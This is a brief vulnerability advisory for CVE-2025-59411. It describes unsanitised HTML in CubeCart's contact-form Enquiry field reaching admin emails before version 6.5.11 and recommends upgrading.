CVE-2025-59411

Name of the Vulnerable Software and Affected Versions CubeCart versions prior to 6.5.11

Description CubeCart is an ecommerce software solution. The contact form’s Enquiry field accepts raw HTML, which is included directly in the email sent to the store administrator. Submitting HTML through the Enquiry field results in the administrator receiving an email containing that HTML. This indicates a lack of proper escaping or sanitization of user input before outputting it in email, potentially leading to Cross-Site Scripting or HTML injection within email clients or the administrative user interface. The Enquiry field is the vulnerable parameter.

Recommendations Update to version 6.5.11 or later.